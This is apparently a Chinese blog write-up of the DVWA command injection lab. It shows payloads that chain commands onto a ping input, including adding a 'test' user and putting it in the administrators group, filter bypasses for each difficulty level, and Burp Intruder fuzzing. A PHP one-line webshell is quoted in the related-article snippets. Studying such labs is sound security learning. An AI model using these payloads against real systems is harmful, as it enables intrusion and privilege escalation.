N3 DVWA Command Injection(命令注入)

最新推荐文章于 2024-03-17 14:21:39 发布
最新推荐文章于 2024-03-17 14:21:39 发布
阅读量497 收藏 4
点赞数 1
分类专栏: DVWA 文章标签: web安全 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40684306/article/details/107998325
版权

一.基础知识

1.ping命令
ping ip地址 :测试该ip是否在线
ping -n 2 ip地址:Windows系统,发送两次ping包命令。
ping -c 2 ip地址:Linux系统,发送两次ping包命令。
ping 127.0.0.1 :测试本地tcp/ip服务是否正常工作

2.ipconfig命令
ipconfig:Windows系统查看本机ip的命令
ifconfig:Linux系统查看本机ip的命令

3.net user
net user 用户名 密码 /add :Windows系统添加用户命令
net localgroup administrators 用户名 /add:将该用户添加到超级管理员组

4.连接符
ping 127.0.0.1 && ipconfig :如果成功执行第一个命令,则继续执行第二个命令
ping 127.0.0.1 & ipconfig:第一个命令无论执行成功与否,都继续执行第二个命令
ping 127.0.0.1 || ipconfig:第一个命令成功执行,则第二个命令不执行。若第一个命令执行错误,则执行后面命令。
ping 127.0.0.1 | ipconfig:第一个命令无论正确与否,都只执行第二个命令
ping 127.0.0.1 ;ipconfig:Linux系统下的命令,执行第一个和第二个命令。

二、Low级别

1.源码分析
在这里插入图片描述
这里我们可以看到,将用户输入的 ip 赋值给$target,直接执行ping $target,中间不做任何过滤处理。

2.手动注入
127.0.0.1 && ipconfig
127.0.0.1 & ipconfig
127.0.0.1 | ipconfig
127.0.0.1 ; ifconfig //DVWA服务器为Linux系统时
分别输入以上命令,可以发现,均可返回ipconfig命令的结果
在这里插入图片描述
说明我们可以在这里可以进行命令注入。
那么我们通过这个注入点,为系统创建一个新的用户,并赋予管理员权限。
可以通过以下命令实现
127.0.0.1 && net user test test /add
127.0.0.1&& net localgroup administrators test /add
我们输入第一条命令
在这里插入图片描述

输入命令后,打开搭载DVWA的靶机,输入net user查看是否成功创建用户。
在这里插入图片描述
发现已经成功为我们创建了账号为test 密码为test 的用户,输入net user test,发现该用户目前在user组中.
在这里插入图片描述
我们执行第二条命令,再次查看。
在这里插入图片描述
在这里插入图片描述
发现已经加入超级管理员组,拥有了超级管理员权限。这样一次手工命令注入就完成了。
实验做完后,记得输入net user test /del命令,将刚刚创建的test用户删除哦。

3.批量注入
我们将命令放入一个txt文件,做出一个命令字典。
在这里插入图片描述
打开Burpsuite,将火狐浏览器设置为代理模式。
输入127.0.0.1,submit。打开Burpsuite,将数据包传到Intruder模块,使用sniper模式跑字典。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
因为Windows系统默认ping 4次,所以速度比较慢。
也可以使用 -n 1 127.0.0.1 && ipconfig,将ping包设置为1次,可以加快速度。
我们可以看到,命令已经成功执行。我们进入DVWA的靶机,查看一下是否已经成功创建test用户。
在这里插入图片描述
发现已经成功创建。
在这里插入图片描述
通过bp批量注入也完成了。

三、Meduim级别

1.源码分析
在这里插入图片描述
2.命令注入
我们发现这个只对&&和;进行了过滤
那么,我们不使用&&和;命令,使用&、|、||依旧可以绕过。
在这里插入图片描述
同理,字典更换为
127.0.0.1 & ipconfig
127.0.0.1 || ipconfig
127.0.0.1 | ipconfig
127.0.0.1|net user test test /add
127.0.0.1|net localgroup administrators test /add
依旧可以进行注入
在这里插入图片描述
在这里插入图片描述
这样meduim级别的命令注入就成功完成了!

四、high级别

1.源码分析
在这里插入图片描述
我们发现,基本上所有的关键字都被过滤了,但在|的地方,由于失误,多加了一个空格,导致我们输入|不加空格,是可以绕开的。
那么下面我们尝试一下。发现127.0.0.1|ipconfig (|后不加空格)是可以绕过过滤的。
在这里插入图片描述
于是,我们可以构建字典
127.0.0.1|ipconfig
127.0.0.1|net user test test /add
127.0.0.1|net localgroup administrators test /add
发现命令执行成功
在这里插入图片描述

在这里插入图片描述
这样,high级别的命令注入就完成了,大家动手试一试吧!
做完实验,一定记得删除自己创建的用户哦!

尐猴子君
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DVWA系列(二)——使用Burpsuite进行Command Injection命令注入
橘子女侠
04-29 3060
1. Command Injection简介 (1)命令执行概念 命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属于代码执行范围内;PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一;就好比说一句话木马<?php @eval($_POST['cmd']);?> (2)分类 代码过滤不严或无过滤; 系统漏洞造成的命令执行,bash破壳漏洞,该漏洞可以构...
DVWA 命令注入
qq_41326328的博客
03-12 1130
DVWA 命令注入 实验 首先我们探讨一下 什么叫命令注入,指的是利用没有验证过的恶意命令或代码,对网站或者服务器进行渗透攻击。 注入有很多种,并不仅仅是SQL注入。比如: 命令注入Command injection) Eval注入(Eval injection) 客户端脚本攻击(Script insertion) 跨网站脚本攻击(Cross Site Scripting,XSS) SQL注入...
DVWA_Command Injection(命令注入)
yaowink的博客
05-14 839
命令注入是一个非常大的漏洞,基本上有这个漏洞,系统就可以很容易被拿下。 一、首先,进入DVWA Security 改impossible为Low并提交。 进入Command Injection页面 点击View Source查看源码,源码非常简单,就只有ping,没有任何过滤 在Command Injection页面输入127.0.0.1提交,会显示 输入127.0.0.1&&ipconfig会显示dvwa宿主机的ip地址和DNS 127.0.0.1后..
DVWA系列(二)——使用BurpSuite进行Command injection命令注入
weixin_45116657的博客
08-21 907
Command Injection命令注入)简介: 1、命令执行概念: 命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属于代码执行范围;PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一。也就好比一句话<?php @eval($_POST[cmd]);?> ...
最详细的SQL注入相关的命令整理
古剑楠的专栏
09-23 1003
最详细的SQL注入相关的命令整理 (转)   [ 日期: 2006-09-17 12:32 | 作者: d99 | 来自: 转 | | ]   1、   用^转义字符来写ASP(一句话木马)文件的方法:?   http://192.168.1
php审计之——DVWA命令注入
qq_44632427的博客
07-24 564
命令注入命令注入命令注入的条件DVWA命令注入漏洞总结这几个难度漏洞并审计漏洞解决方法 命令注入 命令:这个命令指的是操作系统的命令命令注入:就是通过web程序,在服务器上拼接系统的命令。有些网站对这些有需求,就开放了这些功能,但是,没有对命令进行严格的过滤,从而导致命令注入漏洞。 命令注入的条件 1、web应用程序调用可执行系统命令的函数。 2、执行系统命令函数或者函数的参数可控,如果它把...
命令注入讲解ppt.pptx
08-10
其中 Command Injection 模块就是我们本次学习所需要使用到的。 DVWA 示例讲解: 进入页面后,可以看到 DVWA 提供了测试域名 /IP 的 Ping 服务(命令执行漏洞测试模块),并将 Ping 命令的执行过程显示出来。下面...
Kali下利用XAMPP搭建DVWA及使用command injection
07-25
DVWA安装
DVWA之SQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
sql注入字典fuzz
01-11
sql注入字典fuzz
DVWA_Tool.rar
02-13
Web应用程序(DVWA)是一个很容易受到攻击的PHP / MySQL Web应用程序。其主要目标是帮助安全专业...DVWA的目标是通过简单直接的界面练习一些最常见的Web漏洞,具有各种难度。请注意,此软件存在记录和未记录的漏洞。
DVWA靶机通关攻略第二关——命令注入
小飞飞的博客
03-07 712
DVWA靶机命令注入详细教学
命令注入总结
weixin_44576725的博客
12-15 6466
文章目录命令注入总结原理常见的危险函数PHPsystemexecpassthrushell_execpopenproc_open反引号Pythonsystempopensubprocess.call/subprocess.runspawnJavajava.lang.Runtime.getRuntime().exec(command)Linux下常用的符号特殊符号通配符常用绕过命令分隔与执行多条命令空格绕过绕过 escapeshellcmd黑名单绕过无参数rce过滤字母或数字常用读取文件方式常用读取目录方式利
使用burpsuite抓包 + sql工具注入 dvwa初级靶场
太阳照耀我走四方
02-13 2363
第一次burpsuite + sqlmap 抓包拿flag
DVWA通关之命令注入command injection
RuoLi_s的博客
01-28 605
DVWA通关之命令注入command injection) 原文链接请点击:https://www.cnblogs.com/ruoli-s/p/14340551.html 难度等级:low 过关思路 我们先将其难度设置为low,看到其界面如下: 通过分析得知,该功能是输入一个IP地址,然后通过ping进行测试,先输入127.0.0.1和www.baidu.com测试如下: 127.0.0.1 www.baidu.com 可以看到,IP地址和域名都是能够ping通的,接下来就是使用命令
渗透测试-命令执行注入
lza20001103的博客
07-20 2954
渗透测试-命令执行注入
DVWA靶场Command Injection
最新发布
lxz021202的博客
03-17 522
解析DVWA靶场Command Injection,通过这个漏洞实现远程连接。
DVWA 初次尝试(下)
borrrrring的博客
02-07 278
SQL Injection (Blind)(SQL盲注) Low 查看源码,可以发现没有任何的过滤以及进行检查的语句,我们可以先进行测试 我们可以发现无论输入什么都只会出现这两个语句,即由此可以判断出这就是盲注。 当我们进行盲注时,不会进行报错,只会对我们输入的命令进行判断,判断是否正确。 一、以布尔盲注示例:(根据显示存在与否来进行判断) 判断是否存在注入,以及注入的是字符型还是数字型 输入 1 显示存在 输入1’ and 1=1# 显示存在 输入1’ and 1=2# 显示不存在 即是存在字符
dvwa command injection
03-16
DVWA 中,command injection命令注入)是一种常见的漏洞类型,攻击者可以通过向 Web 应用程序发送恶意输入来在服务器上执行任意命令。 下面是一些漏洞利用的基本步骤: 1. 打开 DVWA,并导航到“Command ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尐猴子君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值